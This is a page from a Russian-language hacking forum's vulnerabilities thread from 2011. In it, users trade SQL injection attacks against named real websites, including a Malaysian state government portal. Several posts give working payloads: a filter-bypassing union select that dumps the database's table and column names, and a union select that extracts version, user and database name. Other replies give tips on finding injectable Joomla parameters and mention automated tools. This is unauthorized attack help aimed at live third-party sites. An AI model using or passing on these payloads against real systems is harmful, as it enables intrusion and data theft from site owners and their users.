HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1888 из 2438 « Первая < 8881388178818381878 1884 1885 1886 1887 1888 1889 1890 1891 1892 1898193819882388 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #18871  
Старый 15.12.2011, 21:46
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию
http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+
 
Ответить с цитированием

  #18872  
Старый 15.12.2011, 22:40
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от shadowrun  
shadowrun said:
http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+
Это делается так

Цитата:
Сообщение от None  
http://pressfortruth.ca/dvd_dtls.php?rid=1'+union+/*!select*/+1,2,3,4,5,6,7,8,9,10,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),12,13,14,15+--+
 
Ответить с цитированием

  #18873  
Старый 15.12.2011, 22:45
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию
er9j6@

Спасибо. Где можно получить подробности об этом способе?
 
Ответить с цитированием

  #18874  
Старый 16.12.2011, 00:00
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию
Цитата:
Сообщение от shadowrun  
shadowrun said:
er9j6@
Спасибо. Где можно получить подробности об этом способе?
Это просто обход фильтров /*! */ () и т.д.
 
Ответить с цитированием

  #18875  
Старый 16.12.2011, 00:18
dumpers_team
Guest
Сообщений: n/a
Провел на форуме:
5209

Репутация: 0
По умолчанию
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'

Как просмотреть полный путь можно?
 
Ответить с цитированием

  #18876  
Старый 16.12.2011, 00:21
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию
Цитата:
Сообщение от dumpers_team  
dumpers_team said:
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?
Скорее всего, дефолтные значения вроде index.php и т.п..

А вообще, чем тебе так мешает? хевидж не берёт?

Ещё отснифить можно...
 
Ответить с цитированием

  #18877  
Старый 16.12.2011, 01:59
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию
Код:
Code:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?counthit=1%27&newsid=10%27&from=search%27&cid=1%27&searchterm
Got this vuln, no where to start?
 
Ответить с цитированием

  #18878  
Старый 16.12.2011, 02:21
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию
Код:
Code:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?newsid=-10'+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29/*
the site is vulnerable, then the most common sql

Цитата:
Сообщение от None  
Скорее всего, дефолтные значения вроде index.php и т.п..
А вообще, чем тебе так мешает? хевидж не берёт?
Ещё отснифить можно...
интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?

Цитата:
Сообщение от None  
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?
Тебе остается только угадывать. Я не не разу не видел и не использовал sef, не знаю точно как он работает, качать исходники лень, но ссылки у джомлы однотипны, даже в плагинах почти всегда одни и теже параметры встречаются. Так что попробуй что то типа такого

Код:
Code:
/index.php?option=com_virtuemart&Itemid=97
/index.php?option=com_content&task=view&id=524&Itemid=271
может и повезет
 
Ответить с цитированием

  #18879  
Старый 16.12.2011, 15:28
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию
Thank you so much.

I have a String Based problem again.

Код:
Code:
http://motorcitydolls.net/partygal.php?id=-17
Not sure for a solution. Any help?
 
Ответить с цитированием

  #18880  
Старый 16.12.2011, 19:09
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от lightangel  
lightangel said:
Thank you so much.
I have a String Based problem again.
Код:
Code:
http://motorcitydolls.net/partygal.php?id=-17
Not sure for a solution. Any help?
I think that its not vulnerable
 
Ответить с цитированием
Ответ
Страница 1888 из 2438 « Первая < 8881388178818381878 1884 1885 1886 1887 1888 1889 1890 1891 1892 1898193819882388 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ